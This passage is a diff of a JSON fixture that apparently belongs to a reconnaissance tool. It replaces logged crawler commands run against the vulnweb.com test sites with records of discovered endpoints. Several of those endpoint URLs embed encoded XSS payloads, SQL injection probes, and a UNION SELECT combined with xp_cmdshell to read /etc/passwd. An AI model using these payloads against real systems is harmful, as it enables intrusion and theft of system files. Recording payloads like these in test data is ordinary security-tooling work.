+ "response_time": 0.344758364, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 40, + "model": "startScan.endpoint", + "pk": 111, "fields": { "scan_history": 1, - "activity": null, - "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 1 -json -u rest.vulnweb.com:8080 -silent", - "return_code": 0, - "output": "{\"timestamp\":\"2024-09-03T21:28:36.659376329Z\",\"port\":\"8080\",\"url\":\"http://rest.vulnweb.com:8080\",\"input\":\"rest.vulnweb.com:8080\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/json\",\"method\":\"GET\",\"host\":\"35.81.188.86\",\"path\":\"/\",\"time\":\"353.948066ms\",\"a\":[\"35.81.188.86\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":4,\"lines\":1,\"status_code\":200,\"content_length\":36,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n", - "time": "2024-09-03T21:28:34.882Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E", + "content_length": 3420, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.262Z", + "response_time": 0.34490861, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 41, + "model": "startScan.endpoint", + "pk": 112, "fields": { "scan_history": 1, - "activity": null, - "command": "rm /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:28:36.698Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert", + "content_length": 3226, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.427Z", + "response_time": 0.34531113900000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 42, + "model": "startScan.endpoint", + "pk": 113, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://rest.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_rest.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.700Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS", + "content_length": 3232, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.560Z", + "response_time": 0.353577291, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 43, + "model": "startScan.endpoint", + "pk": 114, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://rest.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_rest.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.724Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch.asp%3F", + "content_length": 3196, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.711Z", + "response_time": 0.35230856, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 44, + "model": "startScan.endpoint", + "pk": 115, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://rest.vulnweb.com\" | waybackurls | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_rest.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.740Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da", + "content_length": 3220, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.862Z", + "response_time": 0.353603505, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 45, + "model": "startScan.endpoint", + "pk": 116, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://rest.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_rest.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.756Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml", + "content_length": 3256, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.009Z", + "response_time": 0.34455377600000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 46, + "model": "startScan.endpoint", + "pk": 117, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://rest.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_rest.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:11.771Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E", + "content_length": 3364, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.168Z", + "response_time": 0.339006688, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 47, + "model": "startScan.endpoint", + "pk": 118, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testasp.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_testasp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.789Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html", + "content_length": 3256, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.329Z", + "response_time": 0.344925838, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 48, + "model": "startScan.endpoint", + "pk": 119, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testasp.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_testasp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.807Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E", + "content_length": 3368, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.532Z", + "response_time": 0.363288338, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 49, + "model": "startScan.endpoint", + "pk": 120, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testasp.vulnweb.com\" | waybackurls | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_testasp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.822Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E", + "content_length": 3422, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.661Z", + "response_time": 0.34523530399999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 50, + "model": "startScan.endpoint", + "pk": 121, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testasp.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_testasp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.836Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:36.773Z", + "response_time": 0.339215973, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 51, + "model": "startScan.endpoint", + "pk": 122, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testasp.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_testasp.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:11.849Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.140Z", + "response_time": 0.34008518, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 52, + "model": "startScan.endpoint", + "pk": 123, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testaspnet.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_testaspnet.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.863Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.309Z", + "response_time": 0.351736175, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 53, + "model": "startScan.endpoint", + "pk": 124, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testaspnet.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_testaspnet.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.878Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D", + "content_length": 3282, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.474Z", + "response_time": 0.345532202, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 54, + "model": "startScan.endpoint", + "pk": 125, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testaspnet.vulnweb.com\" | waybackurls | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_testaspnet.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.892Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D2", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.640Z", + "response_time": 0.351728741, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 55, + "model": "startScan.endpoint", + "pk": 126, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testaspnet.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_testaspnet.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.906Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22", + "content_length": 3274, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.787Z", + "response_time": 0.35277754800000005, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 56, + "model": "startScan.endpoint", + "pk": 127, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testaspnet.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_testaspnet.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:11.921Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D", + "content_length": 3282, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:43.903Z", + "response_time": 0.341104941, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 57, + "model": "startScan.endpoint", + "pk": 128, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testhtml5.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_testhtml5.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.935Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:44.021Z", + "response_time": 0.35936435899999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 58, + "model": "startScan.endpoint", + "pk": 129, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testhtml5.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_testhtml5.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.952Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:44.148Z", + "response_time": 0.358222061, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 59, + "model": "startScan.endpoint", + "pk": 131, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testhtml5.vulnweb.com\" | waybackurls | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_testhtml5.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.966Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1&XNYy=3116%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23", + "content_length": 3214, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:44.387Z", + "response_time": 0.35467150199999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 60, + "model": "startScan.endpoint", + "pk": 132, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testhtml5.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_testhtml5.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:11.981Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D1%29%28%28%29%28.%2C%2C%27%22", + "content_length": 3274, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:44.516Z", + "response_time": 0.362777219, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 61, + "model": "startScan.endpoint", + "pk": 200, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testhtml5.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_testhtml5.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:11.995Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=4290", + "content_length": 3168, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.061Z", + "response_time": 0.356427446, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 62, + "model": "startScan.endpoint", + "pk": 203, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testphp.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_testphp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.011Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp", + "content_length": 3617, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.420Z", + "response_time": 0.344642368, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 63, + "model": "startScan.endpoint", + "pk": 204, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testphp.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_testphp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.028Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F", + "content_length": 3615, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.535Z", + "response_time": 0.347072901, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 64, + "model": "startScan.endpoint", + "pk": 205, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testphp.vulnweb.com\" | waybackurls | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_testphp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.042Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3FCookie%3A", + "content_length": 3633, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.650Z", + "response_time": 0.35331300099999996, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 65, + "model": "startScan.endpoint", + "pk": 206, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testphp.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_testphp.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.057Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin%2Easp%3F", + "content_length": 3611, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.765Z", + "response_time": 0.34341035, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 66, + "model": "startScan.endpoint", + "pk": 207, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://testphp.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_testphp.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:12.072Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FRegister%2Easp%3F", + "content_length": 3617, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.881Z", + "response_time": 0.34322284000000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 67, + "model": "startScan.endpoint", + "pk": 208, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.087Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin.asp%3F", + "content_length": 3611, + "page_title": 